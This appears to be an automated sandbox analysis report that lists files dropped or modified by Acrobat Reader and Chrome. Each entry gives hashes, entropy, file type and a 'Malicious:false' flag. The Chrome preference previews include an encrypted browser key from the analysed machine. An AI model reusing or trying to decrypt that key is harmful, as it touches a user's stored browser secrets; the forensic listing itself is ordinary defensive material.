                                                                                                                                                                                                                            MD5:159B0762A25026CFE296D558A1976825
                                                                                                                                                                                                                            SHA1:1379317306DB6A255D7A4BB03B5AA54BCD8E9C4F
                                                                                                                                                                                                                            SHA-256:6FFEFDD8BEB18539C6AAC773D0A23DBF989D55E0A9D00493269C9AD964739B35
                                                                                                                                                                                                                            SHA-512:E4274B6B186709A5DC3D21F4DDC0EA7B6E65CD5FD1EA9A0B630D26DDFB7A38BC419624C2D7ADBFEBF77136B950EECF15DBE0B945F48E83FC4E76FC1039463DAE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3024000
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):61440
                                                                                                                                                                                                                            Entropy (8bit):3.565003573619617
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:3e59dThrtELJ8fwRRwZsLRGlKhsvXh+vSc:ikYZsLQhUSc
                                                                                                                                                                                                                            MD5:9187A49699D2286DED37BDAA5ED24708
                                                                                                                                                                                                                            SHA1:81FC9FA3071D0EBBD7AC39D70C9D3BDD5F66430C
                                                                                                                                                                                                                            SHA-256:07669ABC8CA5A925D0815D05015EB5CFA52449D0E2B08C46AD10D5849119B006
                                                                                                                                                                                                                            SHA-512:92FB19BE3C3595A33B05CEF38DA7CF5E2A1CB32023FC245A6506843378B576192517A51218FE28F8E11BB70A521C1FCBDB8B7E3EE7C88713A1F43CC6DFB1E1E0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                            File Type:SQLite Rollback Journal
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):8720
                                                                                                                                                                                                                            Entropy (8bit):3.2861882595218868
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:7Mvom1Cniomxiom2om1Nom1Aiom1RROiom1oom1pom1TZiomVsiomg/WqQlmFTIS:7RnyOhjCs/WN49IVXEBodRBkz
                                                                                                                                                                                                                            MD5:1296FCA23AD7296ADA1CCC63A076E1DA
                                                                                                                                                                                                                            SHA1:C772BBCAFC078EF634FC6612C3EBCDD9A7D021C7
                                                                                                                                                                                                                            SHA-256:DD3507F3A736F3E10E22554F03DB2CBFB120568DED1B33C8F9B39F542E209624
                                                                                                                                                                                                                            SHA-512:DD73736D596F6ABC88F4D97B658339C451654A7AC93AC4CFF15599865212BA2547184AAB8761E5B06C51473BF9E8BC736B39CB3A2BE4DCEB3AC8D511458B463D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.... .c.......v_..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s........L.s.y................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                            File Type:PostScript document text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):157443
                                                                                                                                                                                                                            Entropy (8bit):5.172039478677
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:amNTjRlaRlQShhp2VpMKRhWa11quVJzlzofqG9Z0ADWp1ttawvayKLWbVG3+2:RNj3aRlQShhp2VpMKRhWa11quVJX2
                                                                                                                                                                                                                            MD5:A2C6972A1A9506ACE991068D7AD37098
                                                                                                                                                                                                                            SHA1:BF4D2684587CF034BCFC6F74CED551F9E5316440
                                                                                                                                                                                                                            SHA-256:0FB687D20C49DDBADD42ABB489C3B492B5A1893352E2F4B6AA1247EFE7363F65
                                                                                                                                                                                                                            SHA-512:4D03884CA5D1652A79E6D55D8F92F4D138C47D462E05C3E6A685DA6742E98841D9C63720727203B913A179892C413BFB33C05416E1675E0CF80DA98BE90BA5E4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Marlett.FamilyName:Marlett.StyleName:Regular.MenuName:Marlett.StyleBits:0.WeightClass:500.WidthClass:5.AngleClass:0.FullName:Marlett.WritingScript:Roman.WinName:Marlett.FileLength:27724.NameArray:0,Win,1,Marlett.NameArray:0,Mac,4,Marlett.NameArray:0,Win,1,Marlett.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:ArialMT.FamilyName:Arial.StyleName:Regular.MenuName:Arial.StyleBits:0.WeightClass:400.WidthClass:5.AngleClass:0.FullName:Arial.WritingScript:Roman.WinName:Arial.FileLength:1036584.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial.NameArray:0,Win,1,Arial.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Arial-BoldMT.FamilyName:Arial.StyleName:Bold.MenuName:Arial.StyleBits:2.WeightClass:700.WidthClass:5.AngleClass:0.FullName:Arial Bold.WritingScript:Roman.WinName:Arial Bold.FileLength:980756.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial Bold.NameAr
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                            File Type:PostScript document text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):157443
                                                                                                                                                                                                                            Entropy (8bit):5.172039478677
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:amNTjRlaRlQShhp2VpMKRhWa11quVJzlzofqG9Z0ADWp1ttawvayKLWbVG3+2:RNj3aRlQShhp2VpMKRhWa11quVJX2
                                                                                                                                                                                                                            MD5:A2C6972A1A9506ACE991068D7AD37098
                                                                                                                                                                                                                            SHA1:BF4D2684587CF034BCFC6F74CED551F9E5316440
                                                                                                                                                                                                                            SHA-256:0FB687D20C49DDBADD42ABB489C3B492B5A1893352E2F4B6AA1247EFE7363F65
                                                                                                                                                                                                                            SHA-512:4D03884CA5D1652A79E6D55D8F92F4D138C47D462E05C3E6A685DA6742E98841D9C63720727203B913A179892C413BFB33C05416E1675E0CF80DA98BE90BA5E4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Marlett.FamilyName:Marlett.StyleName:Regular.MenuName:Marlett.StyleBits:0.WeightClass:500.WidthClass:5.AngleClass:0.FullName:Marlett.WritingScript:Roman.WinName:Marlett.FileLength:27724.NameArray:0,Win,1,Marlett.NameArray:0,Mac,4,Marlett.NameArray:0,Win,1,Marlett.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:ArialMT.FamilyName:Arial.StyleName:Regular.MenuName:Arial.StyleBits:0.WeightClass:400.WidthClass:5.AngleClass:0.FullName:Arial.WritingScript:Roman.WinName:Arial.FileLength:1036584.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial.NameArray:0,Win,1,Arial.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Arial-BoldMT.FamilyName:Arial.StyleName:Bold.MenuName:Arial.StyleBits:2.WeightClass:700.WidthClass:5.AngleClass:0.FullName:Arial Bold.WritingScript:Roman.WinName:Arial Bold.FileLength:980756.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial Bold.NameAr
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):63598
                                                                                                                                                                                                                            Entropy (8bit):5.433041226997456
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:PCbGNFYGpiyVFiCUZ4qiX/PbN94/5M+uOSLoYaod6CgYyu:J0GpiyVFiB4qiX/PbDm5saoYvK
                                                                                                                                                                                                                            MD5:5978E1D8A5345802CC30415B2CDE078A
                                                                                                                                                                                                                            SHA1:FCB85D919D817922C887A26E1F392511266A00FF
                                                                                                                                                                                                                            SHA-256:DFC02989F6FC3B9CE3F96BCA72594F5E79119F705F00DCD587098DBD1035A6C6
                                                                                                                                                                                                                            SHA-512:E87562041AF41BAB5FF492154126AFAA88D76014530A3C03B007920BD1BFBBCF138C8F30794E244CB019233DE67A006990E87C7F20796A3A398A2E19B66E09F1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:4.382.88.FID.2:o:........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.94.FID.2:o:........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.82.FID.2:o:........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.93.FID.2:o:........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.107.FID.2:o:........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.103.FID.2:o:........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.116.FID.2:o:........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.75.FID.2:o:........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.89.FID.2:o:........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.85.FID.2:o:........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.98.FID.2:o:........:F:Arial-B
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):399160
                                                                                                                                                                                                                            Entropy (8bit):6.026870607850742
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:gRpCqeldMW29TlMJYbG0OP1eVxR+v+F7EFpfY4XB3iE7ZPXYGzLxinQ:OsdB2DKYbGNPUZ+w7wJHyEtAWp
                                                                                                                                                                                                                            MD5:977C798DD52F7F5CF385D9DC96A3EF36
                                                                                                                                                                                                                            SHA1:D150510AFB32AE6094AC05BE4ED232D1CE682B2C
                                                                                                                                                                                                                            SHA-256:DF0A7B2C27C2079FC79976A3131940AFA610DCB592056486A89571AF0C1B277B
                                                                                                                                                                                                                            SHA-512:87E53E0DC2E95E5377AB96F2B7F4062D00F68573DF5893B540C8E6CF817BE2C820D7DC1CCB8F78B9994CDD5F0730F2706A04F6E7681117AF03CAC6EB5A790B4E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.652500003100843e+12,"network":1.652467604e+12,"ticks":267058633.0,"uncertainty":3801552.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230364709079"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):407472
                                                                                                                                                                                                                            Entropy (8bit):6.047008522696675
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:WRpCqeldMW29TlMJYbG0OP1eVxR+v+F7EFpfY4XB3iE7ZPXYGzLxinQ:YsdB2DKYbGNPUZ+w7wJHyEtAWp
                                                                                                                                                                                                                            MD5:0C2D759A06275D8E5704A5DA8089DC98
                                                                                                                                                                                                                            SHA1:B5884672330D3B7FA3B4B25559E014359245C56B
                                                                                                                                                                                                                            SHA-256:6703D38E1C97A1197325DD6CA5137F588C4583763718739BE17A594FA112EE24
                                                                                                                                                                                                                            SHA-512:B91EB3323738C3E49D604517336660457F05E550112A4775E1112152405DF75D24D04B394BBE70A52E4ADD6D3E798C2F800FE57A57FAA4D5AA1175A563475800
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.652500003100843e+12,"network":1.652467604e+12,"ticks":267058633.0,"uncertainty":3801552.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230364709079"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):407472
                                                                                                                                                                                                                            Entropy (8bit):6.047009243479221
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:WRpCqeldMW29TlMJYbG0OP1eVxR+v+F7EFpfY4XB3iE7ZPXYGzLxinQ:YsdB2DKYbGNPUZ+w7wJHyEtAWp
                                                                                                                                                                                                                            MD5:7CBE1E752483D7DFCB0BE9E8FA3CDF1E
                                                                                                                                                                                                                            SHA1:48F5C8BABEA5B6FC74BEBC3463599FC19E70D3B5
                                                                                                                                                                                                                            SHA-256:0B05A81510BD8E2F7DD30C04721236159F6AF324D5A62F6AE85EB919E6E0709E
                                                                                                                                                                                                                            SHA-512:6E678CAE5612647D0DB25E750B4A388672EBB3E6D8F03B58E9EAD0A733DD9B6702E3D4719B309CDCAC257557A5EC812925F3CFFE4AC1FB38276F4307FD4C3610
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.652500003100843e+12,"network":1.652467604e+12,"ticks":267058633.0,"uncertainty":3801552.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245952488007586"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):398990
                                                                                                                                                                                                                            Entropy (8bit):6.026645144390026
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:fRpCqeldMW29TlMJYbG0OP1eVxR+v+F7EFpfY4XB3iE7ZPXYGzLxinQ:LsdB2DKYbGNPUZ+w7wJHyEtAWp
                                                                                                                                                                                                                            MD5:48B9C39AEDB685959943B73197978C51
                                                                                                                                                                                                                            SHA1:D0A54CBA32E47CC5E1D4E0AEFEBE1BD5AE4936AC
                                                                                                                                                                                                                            SHA-256:913C1E660F42F44BD7A01E8C6280DCE8E5B495421DDD315FC92E8294F7B844FD
                                                                                                                                                                                                                            SHA-512:02E4141B2480EA013CF406322EA85DB5A3D07A848AB44C643ECA0F7CAA236B7CF221F316015B9DB0433FBAD07B24BE975A98C749472440729D19601CFA17D070
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.652500003100843e+12,"network":1.652467604e+12,"ticks":267058633.0,"uncertainty":3801552.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230364709079"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):399250
                                                                                                                                                                                                                            Entropy (8bit):6.027039574872666
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:jRpCqeldMW29TlMJYbG0OP1eVxR+v+F7EFpfY4XB3iE7ZPXYGzLxinQ:/sdB2DKYbGNPUZ+w7wJHyEtAWp
                                                                                                                                                                                                                            MD5:FB379EBB95F4913267CB06E959F5E200
                                                                                                                                                                                                                            SHA1:A0E02BDA73507629A0D5F538CD56592965B349E6
                                                                                                                                                                                                                            SHA-256:8F07953CB117DAE06A1056B226AAA6C442C70B622DC42672A786A6ADDFD7688F
                                                                                                                                                                                                                            SHA-512:942B8CA6BA9BF9D16EE3410E71EE31F5ECCC0E3103C12C8869F01ED46BF094154064FBC19E0FE23E61CD1AC09527A0384A96EF9D94868A5688D66C7073E77D8B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.652500003100843e+12,"network":1.652467604e+12,"ticks":267058633.0,"uncertainty":3801552.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230364709079"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):92724
                                                                                                                                                                                                                            Entropy (8bit):3.7443945885205463
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:v/JWmYj5o8LiFNOrbvi63RqEZH05Glcr3EyQx58YMLrzSmfEXUmWqlOkQ2Nf1WPZ:TWpJCklNQeHc+gInv2aKM6GxO
                                                                                                                                                                                                                            MD5:658A9516B509DD78A2DA88475053FB7B
                                                                                                                                                                                                                            SHA1:4FB204AB81CB0B9F154E25691101F6DF10AC6820
                                                                                                                                                                                                                            SHA-256:268089772F5744B75E2DFE52F48922CE893B6C3078FF4E120F35E6C4D3DD6AEC
                                                                                                                                                                                                                            SHA-512:922F8740C0030F696A9BA7099F26FD585C27194CDC5FBCEF5D2571917B41E96BD1B614DA1A03DBD020B8E1F4135E7D4BD7A2295C06992ACF4009B38DCDEBB7E1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0j..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...#\8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):95428
                                                                                                                                                                                                                            Entropy (8bit):3.7445888472480364
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:x/JWmYj5UD8iV7diFNOrbvi63RqEZH05Glcr3EyQx58YMLrzSmfr5XUmWqlOkQ2Z:5eWpJCk8NQeHc+gInv2aKM6Gx/
                                                                                                                                                                                                                            MD5:86F0CF50B16B0E8816D52E3FFF730007
                                                                                                                                                                                                                            SHA1:855CC4C96EF5AC7DC52CD94950F86B6833FDF92F
                                                                                                                                                                                                                            SHA-256:E535C23435900C5302C4026B6E8663DFCFA916C56CF9056A68019834C722382C
                                                                                                                                                                                                                            SHA-512:9E55E170C05A92BF45B0A2B1823ACD8A939EFFD21C9079400E4C4E6E1D1027040D8E7639EC15AE6709D156A672F654075B174B8231424E9186DFB22DB34F162F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.t..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...#\8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):407472
                                                                                                                                                                                                                            Entropy (8bit):6.0470086007265555
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:FRpCqeldMW29TlMJYbG0OP1eVxR+v+F7EFpfY4XB3iE7ZPXYGzLxinQ:tsdB2DKYbGNPUZ+w7wJHyEtAWp
                                                                                                                                                                                                                            MD5:C7500CA1D6EE45DBF6F5A0625E6CEA23
                                                                                                                                                                                                                            SHA1:419BA1360CD86BE9E760F560EAD975AE74912CC6
                                                                                                                                                                                                                            SHA-256:6817F986706518A8B6E216DA8EEDF47A33AEAB103C23BFA1D84D8DA4A2F9004A
                                                                                                                                                                                                                            SHA-512:CFB085F42393F55D3FDDA6E93BFD2A752EE572A04187333738A13D59028DD07C7E166060DC88A4A6AD147E2FB434729428CCFA8C24CB6DBD5BD36381ECCC03AE
                                                                                                                                                                                                                            Malicious:false
